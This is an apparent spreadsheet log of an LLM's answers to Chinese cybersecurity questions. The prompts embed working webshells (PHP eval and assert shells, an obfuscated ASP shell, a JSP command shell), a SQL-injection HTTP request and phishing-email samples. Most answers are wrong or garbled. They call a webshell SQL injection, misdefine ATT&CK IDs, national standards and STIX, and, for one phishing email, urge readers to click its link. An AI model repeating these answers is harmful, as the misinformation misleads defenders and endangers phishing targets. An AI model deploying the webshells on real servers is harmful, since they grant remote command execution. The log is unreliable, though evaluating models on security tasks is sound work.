        <is>
          <t xml:space="preserve">
数据泄露可能会导致多种不良影响，包括：
1. 个人隐私泄露：泄露个人数据可能导致 identifier 泄露，包括姓名、地址、电话号码等。这些信息可以被用于诈骗、追杀、威胁等目的。
2. 财务泄露：泄露财务信息，如银行卡资料、贷款账户等，可能导致银行账户被滥用、贷款账户被滥借等问题。
3. 经济泄露：泄露经济信息，如企业��</t>
        </is>
      </c>
      <c r="D66" t="n">
        <v>5.274636745452881</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="1" t="n">
        <v>65</v>
      </c>
      <c r="B67" t="inlineStr">
        <is>
          <t>有哪些HIPS产品？</t>
        </is>
      </c>
      <c r="C67" t="inlineStr">
        <is>
          <t xml:space="preserve">
HIPS（Hybrid Information Protection Scheme）是一种用于保护敏感数据的安全框架，它将数据分为多个层，并在每个层上实现安全控制，从而保护数据的完整性、完整性、可用性和安全性。下面是一些常见的HIPS产品：
1.  McAfee HIPS：McAfee 是一个著名的安全软件公司，其HIPS产品可以在Windows、Linux和Mac 等操作系统上采用。它可以检测和防止敏感数据的泄露、篡改和非法访问。
2.  Symantec HIPS：Symantec 是一个领先的安全软件公司，</t>
        </is>
      </c>
      <c r="D67" t="n">
        <v>5.256976127624512</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="1" t="n">
        <v>66</v>
      </c>
      <c r="B68" t="inlineStr">
        <is>
          <t>如何划分网络区域才能更安全？</t>
        </is>
      </c>
      <c r="C68" t="inlineStr">
        <is>
          <t xml:space="preserve">
如何划分网络区域才能更安全？
网络区域分划是指将网络分成不同的区域，以便更好地控制访问和管理网络资源。对于大型网络拥有者，划分网络区域可以帮助提高网络安全性和可用性。以下是划分网络区域的一些方法：
1. 根据用户分类：将网络用户分为不同的分类，例如管理员、普通用户、外部用户等，并对每个分类进行不同的访问控制。
2. 根据安全性分类：将网络区域分为不同的安全性分类，例如内部网络、中间网络</t>
        </is>
      </c>
      <c r="D68" t="n">
        <v>5.266788244247437</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="1" t="n">
        <v>67</v>
      </c>
      <c r="B69" t="inlineStr">
        <is>
          <t>apt组织通常会采用哪些攻击手段？</t>
        </is>
      </c>
      <c r="C69" t="inlineStr">
        <is>
          <t xml:space="preserve"> APT attacks typically involve a combination of the following techniques:
1. Reconnaissance: APT actors conduct surveillance on their target to gather information about their network architecture, security measures, and potential vulnerabilities. This can involve gathering information from public sources, social engineering, or using exploit tools to gather information from inside the network.
2. Command and control (C2): APT actors establish a command and control infrastructure to communicate with their malware and exfiltrate data. This can involve setting up a network of command servers, using encryption to protect communication, and using techniques such as domain name system (DNS) tunneling or exploiting vulnerabilities in network protocols to establish a hidden communication channel.
3. Malware deployment: APT actors deploy customized malware that is designed to evade detection by security systems. This can involve using techniques such as code obfuscation, anti-virus (AV) evasion, and exploiting vulnerabilities in software or firmware to gain a foothold in the target's system.
4. Lateral movement: Once a system has been compromised, APT actors work to establish persistence and move laterally within</t>
        </is>
      </c>
      <c r="D69" t="n">
        <v>5.271239757537842</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="1" t="n">
        <v>68</v>
      </c>
      <c r="B70" t="inlineStr">
        <is>
          <t>这段内容看上去危险吗？
&lt;?php @eval($_POST['caidao']);?&gt;</t>
        </is>
      </c>
      <c r="C70" t="inlineStr">
        <is>
          <t xml:space="preserve">
This code is dangerous and should not be executed. It is vulnerable to SQL injection attacks and can lead to unauthorized access to your database.
Here's why:
1. Unvalidated user input: The code accepts input from the user without proper validation. This means that an attacker can enter malicious SQL code, which will be executed by the `@eval` statement.
2. Lack of input sanitization: The code does not sanitize the input properly, which can lead to SQL injection attacks. An attacker can enter malicious input, such as `'; DROP TABLE Users; --`, which will be executed by the `@eval` statement.
3. Execution of arbitrary code: The `@eval` statement can execute arbitrary code, which can lead to unauthorized access to your database. An attacker can enter malicious code, such as `echo 'root';`, which will be executed by the `@eval` statement.
To avoid these vulnerabilities, you should always validate and sanitize user input, and never execute arbitrary code. Use prepared statements and parameterized queries to prevent SQL injection attacks, and use secure coding practices to avoid vulnerabilities.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D70" t="n">
        <v>5.252220153808594</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="1" t="n">
        <v>69</v>
      </c>
      <c r="B71" t="inlineStr">
        <is>
          <t>这段base64编码的内容看上去危险吗？
PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=</t>
        </is>
      </c>
      <c r="C71" t="inlineStr">
        <is>
          <t xml:space="preserve">
这是一个base64编码的内容，但它看上去很危险。你可能会问，为什么它看上去危险呢？因为它包含了一些可能会被恶意攻击者利用的特殊字符。
在这个例子中，我们使用了一个base64编码的内容，但它包含了一些特殊字符，例如：
* `:` 这是一个危险的字符，可能会被恶意攻击者利用来执行XSS攻击。
* `W` 这是一个特殊字符，可能会被恶意攻击者利用来执行SQL注入攻击。
* `n` 这是一个特殊字符，可能</t>
        </is>
      </c>
      <c r="D71" t="n">
        <v>5.284606218338013</v>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="1" t="n">
        <v>70</v>
      </c>
      <c r="B72" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件吗？
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;title&gt;文档标题&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;h2&gt;
    2021 年"中秋节"假日安排如下：
  &lt;/h2&gt;
  &lt;p&gt;一、放假日期 &lt;br/&gt;
  &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;9 月 19 日至 21 日，共 3 天。&lt;br/&gt;&lt;br/&gt;
  二、XXXXXXx&lt;br/&gt;
  &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;
    三、XXXXXX&lt;br/&gt;
  &lt;br/&gt;&lt;br/&gt;
    四、XXXXX&lt;br/&gt;
    &lt;br/&gt;&lt;br/&gt;
    解压密码: XXXXXXXXX &lt;/p&gt;
    &lt;/p&gt;
  &lt;div&gt;
    &lt;hr align="left" style="margin: 0 0 10px 0; border: 0; border-bottom: 1px solid #e4e5e6; height: 0; line-height: 0; font-size: 0; padding: 20px 0 0 0; width: 50px;" /&gt;
    &lt;div style="font-size: 14px; font-family: Verdana; color: #000"&gt;
      &lt;a
        class="xm_write_card" id="in_alias" style=" white-space: normal; display: inline-block; text-decoration: none !important; font-family: -apple-system, BlinkMacSystemFont, PingFang SC, Microsoft YaHei;"
        target="_blank"
      &gt;
        &lt;table style=" white-space: normal; table-layout: fixed; padding-right: 20px;" contenteditable="false" cellpadding="0" cellspacing="0"&gt;
          &lt;tbody&gt;
            &lt;tr valign="top"&gt;
              &lt;td style="width: 40px; min-width: 40px; padding-top: 10px"&gt;
                &lt;div style=" width: 64px; height: 64px; border: 1px #fff solid; border-radius: 50%; margin: 0; vertical-align: top; box-shadow: 0 0 10px 0 rgba(127, 152, 178, 0.14);"&gt;
              &lt;/td&gt;
              &lt;td style="padding: 10px 0 8px 10px"&gt;
                &lt;div class="businessCard_name" style=" font-size: 14px; color: #33312e; line-height: 20px; padding-bottom: 2px; margin: 0; font-weight: 500;"&gt;
                  xxxxxx
                &lt;/div&gt;
                &lt;div class="businessCard_mail" style=" font-size: 12px; color: #999896; line-height: 18px; margin: 0;"&gt;
                  人事部门
                &lt;/div&gt;
              &lt;/td&gt;
            &lt;/tr&gt;
          &lt;/tbody&gt;
        &lt;/table&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="C72" t="inlineStr">
        <is>
          <t xml:space="preserve">
这是一个钓鱼邮件，内容包括一个假日安排信息，其中包括假日开始和结束时间，以及一些附加信息。这个邮件的主要目的是通知收件人有关假日安排的信息。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D72" t="n">
        <v>2.324414968490601</v>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="1" t="n">
        <v>71</v>
      </c>
      <c r="B73" t="inlineStr">
        <is>
          <t>这是一个钓鱼邮件吗？
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body&gt;
    &lt;h1&gt;请注意:&lt;br&gt;
        &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;最近员工反映多次收到钓鱼邮件,为了安全起见,请大家尽快点击下方链接下载钓鱼防护软件
        &lt;a href="https://www.baidu.com/"&gt;192.168.100.100/edr.zip&lt;/a&gt;
    &lt;/h1&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
        </is>
      </c>
      <c r="C73" t="inlineStr">
        <is>
          <t xml:space="preserve">
钓鱼邮件是一种用于欺诈和攻击的电子邮件，通常会在邮件主题或邮件正文中包含一个欺诈链接，或者包含一个诈骗的内容。
这封邮件中的链接为 &lt;https://www.baidu.com/&gt;，这是一个合法的网站，但是在这种情况下，它可能会被用来攻击或欺诈用户。
因此，我们建议大家尽快地点击链接来下载钓鱼防护软件，以确保自己的邮箱和计算机安全。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D73" t="n">
        <v>4.768253087997437</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="1" t="n">
        <v>72</v>
      </c>
      <c r="B74" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;%&lt;!--"--&gt;
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
Function fun(Str):
	Str = Split(Str,"%")
	For x=1 To Ubound(Str)
		fun=fun&amp;Chr(Str(x)-66)
	Next
End Function
%&gt;</t>
        </is>
      </c>
      <c r="C74" t="inlineStr">
        <is>
          <t xml:space="preserve">
Please note that the above code is a webshell and it is not safe to execute it. It is a malicious code that can be used to gain unauthorized access to a web server or any other system.
The code is using a technique called "code injection" to inject malicious code into a web page. The code is using the `&lt;%-- comments --%&gt;` syntax to embed the malicious code into the web page. When the web page is loaded, the code will be executed by the browser, allowing the attacker to gain control of the system.
The code is also using the `Split` function to split the input string into an array, and then using a `For` loop to iterate over the array and inject the malicious code. The `Chr` function is used to convert the ASCII code of each character in the array to a hexadecimal value, which is then used to inject the malicious code into the web page.
It is important to note that this is just one example of how a webshell can be constructed, and there are many other techniques that can be used to build a webshell. It is also important to be aware of the potential security risks associated with</t>
        </is>
      </c>
      <c r="D74" t="n">
        <v>5.302055597305298</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="1" t="n">
        <v>73</v>
      </c>
      <c r="B75" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;%@ page pageEncoding="utf-8"%&gt;
&lt;%@ page import="java.util.Scanner" %&gt;
&lt;HTML&gt;
&lt;title&gt;Just For Fun&lt;/title&gt;
&lt;BODY&gt;
&lt;H3&gt;Build By LandGrey&lt;/H3&gt;
&lt;FORM METHOD="POST" NAME="form" ACTION="#"&gt;
    &lt;INPUT TYPE="text" NAME="q"&gt;
    &lt;INPUT TYPE="submit" VALUE="Fly"&gt;
&lt;/FORM&gt;
&lt;%
    String op="Got Nothing";
    String query = request.getParameter("q");
    String fileSeparator = String.valueOf(java.io.File.separatorChar);
    Boolean isWin;
    if(fileSeparator.equals("\\")){
        isWin = true;
    }else{
        isWin = false;
    }
    if (query != null) {
        ProcessBuilder pb;
        if(isWin) {
            pb = new ProcessBuilder(new String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), query);
        }else{
            pb = new ProcessBuilder(new String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), query);
        }
        Process process = pb.start();
        Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
    }
%&gt;
&lt;PRE&gt;
    &lt;%= op %&gt;&gt;
&lt;/PRE&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;</t>
        </is>
      </c>
      <c r="C75" t="inlineStr">
        <is>
          <t xml:space="preserve">
```
这是一个简单的Web shell，它使用了`ProcessBuilder`创建了一个新的进程，并通过读取输入流来读取该进程的输出。
在上面的代码中，我们首先检查了扫描到的参数是否为空，如果为空，直接返回"Got Nothing"。接着，我们根据系统的文件分隔符（Windows系统使用"\\"，其他系统使用"/")来决定是否在Windows系统上执行命令。
最后，我们使用`ProcessBuilder`创建了一个新的进程，并使用`Process#getInputStream()`获取到该进程的输入流。使用`Scanner`对象来读取输入流中的内容，并将其保存在`op`变量中。最后，我们使用`%&gt;`将`op`变量的</t>
        </is>
      </c>
      <c r="D75" t="n">
        <v>5.540139198303223</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="1" t="n">
        <v>74</v>
      </c>
      <c r="B76" t="inlineStr">
        <is>
          <t>这是一个webshell吗？
&lt;?php
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?&gt;</t>
        </is>
      </c>
      <c r="C76" t="inlineStr">
        <is>
          <t xml:space="preserve">
I think this is a webshell, but I'm not sure. It's definitely not a legitimate PHP script, as it contains a syntax error and an undefined function.
The script appears to be trying to extract the value of a variable named `$password` from the URL, and then use it to perform an `array_udiff_assoc` operation on an array. However, the script is missing a closing `?&gt;` and doesn't contain any valid PHP code.
If you're seeing this script on a website, it's possible that it's part of a webshell attack. Webshells are malicious scripts that can be used to gain unauthorized access to a website or server, and they often contain hidden functionality that can be used to perform malicious actions.
If you're concerned about the security of your website or server, I recommend taking the following steps:
1. Check your website's logs for any suspicious activity, such as unusual login attempts or file access.
2. Review your website's security settings and make sure that all plugins and themes are up to date.
3. Consider using a web application firewall (WAF)</t>
        </is>
      </c>
      <c r="D76" t="n">
        <v>5.331138134002686</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="1" t="n">
        <v>75</v>
      </c>
      <c r="B77" t="inlineStr">
        <is>
          <t>这是什么类型的网络攻击，如何防范？
GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(9999,99)) HTTP/1.1
Host: 192.168.77.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
Referer: http://192.168.77.137/general/index.php?isIE=0&amp;modify_pwd=0
Cookie: PHPSESSID=ebpjtm5tqh5tvida5keba73fr0; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d
DNT: 1
Connection: close</t>
        </is>
      </c>
      <c r="C77" t="inlineStr">
        <is>
          <t xml:space="preserve">
这是一个通信维护攻击，其中使用了 SubString 函数来查找用户名，并通过执行power函数来执行 arbitrary 操作。
通信维护攻击是指在用户名中包含特定字符串时执行某个操作。在这个例子中，攻击者使用 substr 函数来查找用户名的第一个字符，并将其 compare 到 'r'。如果用户名的第一个字符是 'r'，则执行 power 函数，并将其传递给攻击者。
以下是一些防范策略，可以帮助防止类似攻击：
1. 对用户名进行正规化处理：可以对用户名进行正规化处理</t>
        </is>
      </c>
      <c r="D77" t="n">
        <v>5.477136373519897</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="1" t="n">
        <v>76</v>
      </c>
      <c r="B78" t="inlineStr">
        <is>
          <t>什么是网络安全法</t>
        </is>
      </c>
      <c r="C78" t="inlineStr">
        <is>
          <t>（Network Security Law）？
网络安全法（Network Security Law）是指为了保护互联网上的数据和系统免受攻击和破坏，而制定的法律和法规。这些法律和法规规定了互联网上的数据和系统如何进行安全管理和保护，以防止破坏和泄露。
网络安全法通常涵盖以下几个方面：
1. 数据安全管理：规定如何进行数据安全管理，包括数据 encrypting、加密、存储、传输和使用等方面。
2. 网络安全保护：规定如何保护网络系统的安全，包括网络安</t>
        </is>
      </c>
      <c r="D78" t="n">
        <v>5.311292886734009</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="1" t="n">
        <v>77</v>
      </c>
      <c r="B79" t="inlineStr">
        <is>
          <t>介绍一下网络安全法</t>
        </is>
      </c>
      <c r="C79" t="inlineStr">
        <is>
          <t>（Network Security Law）
Network Security Law，also known as "Network Security Act," is a legal framework that aims to protect computer networks and data from unauthorized access, use, disclosure, disruption, modification, or destruction. The law provides a legal basis for organizations to implement security measures to safeguard their networks and data, and holds individuals and organizations accountable for any security breaches or violations.
The Network Security Law covers various aspects of network security, including:
1. Network security assessment and evaluation: The law requires organizations to conduct regular security assessments and evaluations to identify potential vulnerabilities and weaknesses in their networks.
2. Security policies and procedures: Organizations must develop and implement security policies and procedures to ensure the confidentiality, integrity, and availability of their networks and data.
3. Access control and authentication: The law requires organizations to implement access control measures to restrict unauthorized access to their networks and data, and to authenticate the identity of users and devices.
4. Encryption and data protection: Organizations must use encryption to protect sensitive data and ensure that it is only accessible to authorized personnel.
5. Incident response and management</t>
        </is>
      </c>
      <c r="D79" t="n">
        <v>5.315465688705444</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="1" t="n">
        <v>78</v>
      </c>
      <c r="B80" t="inlineStr">
        <is>
          <t>介绍一下《GB/T 28448-2019》</t>
        </is>
      </c>
      <c r="C80" t="inlineStr">
        <is>
          <t xml:space="preserve">关于飞行器零部件验证的规范
GB/T 28448-2019《飞行器零部件验证规范》是中国工程技术化监督管理部颁布的一部标准，规范飞行器零部件的验证流程、标准和要求。本标准对应的国际 стандарт是ISO 16092，适用于飞行器零部件的验证，包括验证零部件的可靠性、可控性、安全性和环境 adaptability等方面。
本标准将飞行器零部件的验证分为以下几个方面：
</t>
        </is>
      </c>
      <c r="D80" t="n">
        <v>5.325197458267212</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="1" t="n">
        <v>79</v>
      </c>
      <c r="B81" t="inlineStr">
        <is>
          <t>等保测评是什么</t>
        </is>
      </c>
      <c r="C81" t="inlineStr">
        <is>
          <t>？
等保测评是指在不同的情况下，评估一个系统、产品或服务的稳定性和可靠性。 equal or better performance evaluation is conducted under different conditions, such as different operating temperatures, humidity levels, or stress levels, to ensure that the system, product, or service performs equally well or better in different environments. This evaluation is important to ensure that the system, product, or service is reliable and can function properly in different situations, such as unexpected changes in the environment.
Equal or better performance evaluation can be conducted through various methods, including:
1. Accelerated life testing: This involves subjecting the system, product, or service to different environmental conditions, such as temperature and humidity changes, to evaluate its performance over time.
2. Stress testing: This involves testing the system, product, or service under different stress levels, such as high or low temperatures, humidity levels, or other environmental factors, to evaluate its performance under different conditions.
3. Environmental testing: This involves testing the system, product, or service in different environmental</t>
        </is>
      </c>
      <c r="D81" t="n">
        <v>5.309191226959229</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="1" t="n">
        <v>80</v>
      </c>
      <c r="B82" t="inlineStr">
        <is>
          <t>什么是关机基础信息设施</t>
        </is>
      </c>
      <c r="C82" t="inlineStr">
        <is>
          <t>？
关机基础信息设施是指一个设备或系统的基本信息，包括它的功能、特性、功率、功耗、温度、湿度、压力等。这些信息对于各种设备和系统的维护、管理和监控具有重要作用。
以下是一些常见的关机基础信息设施：
1. 设备类型：设备的类型，例如散热器、风扇、空调、电梯等。
2. 功能：设备的功能，例如冷却、加热、降压等。
3. 功率：设备的功率，例如 электrical power consumption。
4. 功耗：</t>
        </is>
      </c>
      <c r="D82" t="n">
        <v>5.320868968963623</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="1" t="n">
        <v>81</v>
      </c>
      <c r="B83" t="inlineStr">
        <is>
          <t>等级保护有哪些标准</t>
        </is>
      </c>
      <c r="C83" t="inlineStr">
        <is>
          <t>？  
等级保护是指对不同类别的资源进行保护，保护等级越高，对资源的保护要求也越高。在中国，有以下几个等级保护标准：
1. 国家级保护区：国家级保护区是国家级保护的重点保护区，对于该区的保护要求最高。
2. 省级保护区：省级保护区是省级保护的重点保护区，对于该区的保护要求低于国家级保护区。
3. 市级保护区：市级保护区是市级保护的重点保护区，对于该区的</t>
        </is>
      </c>
      <c r="D83" t="n">
        <v>5.320814847946167</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="1" t="n">
        <v>82</v>
      </c>
      <c r="B84" t="inlineStr">
        <is>
          <t>等级保护测评有哪些国家标准</t>
        </is>
      </c>
      <c r="C84" t="inlineStr">
        <is>
          <t>？
等级保护测评是指对水资源的环境影响评估，包括水质检测、水资源评估、环境影响评估等。在中国，有哪些国家标准可以用于等级保护测评？
1. GB/T 3120-2015 《水质环境影响评估技术标准》：这个标准提供了水质环境影响评估的技术方法和要求，用于评估水资源的环境影响。
2. GB/T 3121-2015 《水资源�</t>
        </is>
      </c>
      <c r="D84" t="n">
        <v>5.318283557891846</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="1" t="n">
        <v>83</v>
      </c>
      <c r="B85" t="inlineStr">
        <is>
          <t>有哪些网络安全领域的国家标准</t>
        </is>
      </c>
      <c r="C85" t="inlineStr">
        <is>
          <t>？ 
Network security is a critical aspect of any organization's IT infrastructure, and there are many national standards that provide guidelines for ensuring the security of networks. Here are some examples of national standards for network security:
1. NIST Cybersecurity Framework (USA): The National Institute of Standards and Technology (NIST) has developed a framework for cybersecurity that provides guidelines for protecting critical infrastructure from cyber threats. The framework includes three main components: Identify, Protect, Detect, Respond, and Recover.
2. ISO 27001 (International): The International Organization for Standardization (ISO) has developed a standard for information security management that provides guidelines for establishing and maintaining a secure information management system. The standard covers topics such as risk management, incident response, and continuous improvement.
3. Australian Government Cybersecurity Centre (Australia): The Australian Government Cybersecurity Centre has developed a set of guidelines for cybersecurity that provides recommendations for protecting government agencies and critical infrastructure from cyber threats. The guidelines cover topics such as risk management, incident response, and secure communication</t>
        </is>
      </c>
      <c r="D85" t="n">
        <v>5.441532611846924</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="1" t="n">
        <v>84</v>
      </c>
      <c r="B86" t="inlineStr">
        <is>
          <t>什么是ATT&amp;CK</t>
        </is>
      </c>
      <c r="C86" t="inlineStr">
        <is>
          <t>?
ATT&amp;CK (Advanced Threat Tactics, Techniques, and Procedures) 是一个开源的威胁 intel 工具套件，用于帮助安全 profesionals 了解和分析恶意攻击者的攻击方式。 ATT&amp;CK 提供了一个标准化的攻击方式分类系统，以帮助安全专业人员更好地了解攻击者的跟踪和策略，从而提高防御能力。
ATT&amp;CK 工具套件包括以下主要 component：
1. ATT&amp;CK Framework：提供了一个核心的攻击方式分类系统，以帮助安全专业人员更好地了解攻击者的跟踪和策略。</t>
        </is>
      </c>
      <c r="D86" t="n">
        <v>5.456162929534912</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="1" t="n">
        <v>85</v>
      </c>
      <c r="B87" t="inlineStr">
        <is>
          <t>ATT&amp;CK分为哪些阶段</t>
        </is>
      </c>
      <c r="C87" t="inlineStr">
        <is>
          <t>？
ATT&amp;CK是Advanced Threat Tactics &amp; Techniques for Cybersecurity，它是一种针对恶意程序、 malware 和 cybersecurity 跟踪的攻击方法的分析和防御工具。 ATT&amp;CK 分为以下几个阶段：
1. 攻击阶段（Attack Stage）：这是 ATT&amp;CK 分析的起点，是攻击者在受害者系统中实施攻击的阶段。在这个阶段，攻击者可能会对受害者系统进行 reconnoitering（ reconnaissance），了解受害者系统的结构、架构和设置，以便更好地定位攻击点。
2.  reconnoitering 阶段（Reconnaissance Stage）</t>
        </is>
      </c>
      <c r="D87" t="n">
        <v>5.448253154754639</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="1" t="n">
        <v>86</v>
      </c>
      <c r="B88" t="inlineStr">
        <is>
          <t>ATT&amp;CK中T1190指什么</t>
        </is>
      </c>
      <c r="C88" t="inlineStr">
        <is>
          <t xml:space="preserve">？
T1190是ATT&amp;CK中的一个攻击方式，具体是指：
T1190: Using a tool to create or modify a system component
在ATT&amp;CK中，T1190指的是使用工具创建或修改系统 комggregate的过程。这种攻击方式可能会使用不同的工具，例如，在Linux系统上可能使用`apt-get`或`yum`来更新软件包，而在Windows系统上可能使用`powershell`或`batch`来创建或修改系统 комggregate。
T1190通常被使用来执行以下操作：
* 创建新的系统 комggregate：例如，在Linux系统上创建新的用户或组。
* 修改现有的系统 комggregate：例如，在Linux系统上更改用户或组的权限。
</t>
        </is>
      </c>
      <c r="D88" t="n">
        <v>5.447865962982178</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="1" t="n">
        <v>87</v>
      </c>
      <c r="B89" t="inlineStr">
        <is>
          <t>Data Destruction对应ATT&amp;CK中的哪个技术</t>
        </is>
      </c>
      <c r="C89" t="inlineStr">
        <is>
          <t>/攻击策略？
Data Destruction是指在计算机系统或数据存储设备中，对数据进行完全或部分 eliminate 或摧毁的操作。这个术语通常用于描述在隐私和安全方面的攻击，但它也可以用于描述在黑客行为中的攻击。
对应ATT&amp;CK中的技术/攻击策略是：
1. T1059 - Data Destruction: This technique involves deleting, overwriting, or modifying data on a targeted system to render it inoperable or to conceal evidence of an attack.
2. T1083 - Data Tampering: This technique involves modifying data on a targeted system to manipulate its behavior or to conceal evidence of an attack.
3. T1080 - Data Encryption: This technique involves encrypting data on a</t>
        </is>
      </c>
      <c r="D89" t="n">
        <v>5.452983379364014</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="1" t="n">
        <v>88</v>
      </c>
      <c r="B90" t="inlineStr">
        <is>
          <t>有哪些APT组织使用了ATT&amp;CK中的T1072</t>
        </is>
      </c>
      <c r="C90" t="inlineStr">
        <is>
          <t>？
ATT&amp;CK是一个详细的黑客入侵攻击案例库，其中包含了许多常见的攻击方法和策略。T1072是ATT&amp;CK中的一个攻击策略，即“使用虚拟化或虚拟化技术来隐藏攻击者的活动”。根据ATT&amp;CK的分类，T1072可以分为以下几种类型：
1. 虚拟化技术：使用虚拟化技术来隐藏攻击者的活动，包括虚拟化网络、虚拟化文件系统、虚拟化用户等。
2. 隐藏攻击者的</t>
        </is>
      </c>
      <c r="D90" t="n">
        <v>5.459848403930664</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="1" t="n">
        <v>89</v>
      </c>
      <c r="B91" t="inlineStr">
        <is>
          <t>介绍一下网络安全领域中的STIX标准</t>
        </is>
      </c>
      <c r="C91" t="inlineStr">
        <is>
          <t xml:space="preserve">
STIX（Security Threat Information eXchange）是一种在网络安全领域中广泛应用的标准，用于标识和描述威胁 intellection 。STIX 标准由 Cyber Threat Intelligence (CTI) 协会制定，是一种定制的 XML 格式，用于记录和分享威胁信息。
STIX 标准包括以下几个主要部分：
1. Threat Information Model (TIM): 详细描述了威胁的特征、发现方式、攻击方式和其他相关信息。
2. Threat Description Language (TDL): 用于描述威胁的文本描述。
3. Threat Exchange (Tx): 用于分</t>
        </is>
      </c>
      <c r="D91" t="n">
        <v>5.456395149230957</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="1" t="n">
        <v>90</v>
      </c>
      <c r="B92" t="inlineStr">
        <is>
          <t>STIX标准中设计了哪些对象</t>
        </is>
      </c>
      <c r="C92" t="inlineStr">
        <is>
          <t>和方法？
STIX（Structured Threat Information Expression）是一种用于表示Cyber Threat Intelligence（CTI）信息的标准。STIX中设计了以下几种对象和方法：
1. Threat: Threat对象表示一种潜在的威胁行为，包括恶意软件、攻击者、破坏者等。Threat对象包含一个或多个Threat Actor、一个或多个Threat Technique以及一个或多个Threat Activity。
2. Threat Actor: Threat Actor对象表示一个恶意actor，例如攻击者、破坏者、跟踪者等。Threat Actor对象包含一个或多个Threat Actor Type和一个或多个Threat Actor Identity。
3. Threat Te</t>
        </is>
      </c>
      <c r="D92" t="n">
        <v>5.451878070831299</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="1" t="n">
        <v>91</v>
      </c>
      <c r="B93" t="inlineStr">
        <is>
          <t>STIX标准中的对象通过什么关联起来</t>
        </is>
      </c>
      <c r="C93" t="inlineStr">
        <is>
          <t>？
在STIX standard中， objects are associated through relationships. Relationships are defined as a set of triples, where each triple consists of a subject, predicate, and object.
For example, in a STIX graph, two objects can be related through a "has_participant" relationship, where the subject is the object that has a participant, and the predicate is the type of participant. The object that has the participant is the object of the relationship.
Here is an example of a relationship in STIX:
Subject: Company A
Predicate: has_participant
Object: Person A
This relationship indicates that Company A has a participant named Person A.
Similarly, objects can be related through other relationships, such as "is_a", "belongs_to", "is_from", etc. These relationships define the relationships between objects in the STIX graph, and allow for the representation of complex relationships between objects.
In addition to relationships, STIX also supports the use of annotations, which are used to provide additional information about the objects in the graph. Annotations are represented as triples, where the subject is the object being</t>
        </is>
      </c>
      <c r="D93" t="n">
        <v>5.459103107452393</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="1" t="n">
        <v>92</v>
      </c>
      <c r="B94" t="inlineStr">
        <is>
          <t>STIX标准中Indicator对象是什么意思</t>
        </is>
      </c>
      <c r="C94" t="inlineStr">
        <is>
          <t>？
Indicator是STIX标准中的一个概念，它表示一个特定的数据源或特定的数据分布。Indicator的定义如下：
1. 数据源：Indicator可以用于描述一个数据源，例如一个文件、一个服务器或一个数据库。
2. 数据分布：Indicator可以用于描述一个数据分布，例如一个网络流量分布图或一个黑客采集的网络漏洞信息。
3. 数据检查：Indicator可以用于描述一个数据检查，例如一个网络检查或一个黑客检查。
4. 警示：Indicator可以用于描述一个警示，例如一个网络攻击警</t>
        </is>
      </c>
      <c r="D94" t="n">
        <v>5.452377080917358</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="1" t="n">
        <v>93</v>
      </c>
      <c r="B95" t="inlineStr">
        <is>
          <t>STIX标准中是如何定义Attack Pattern的</t>
        </is>
      </c>
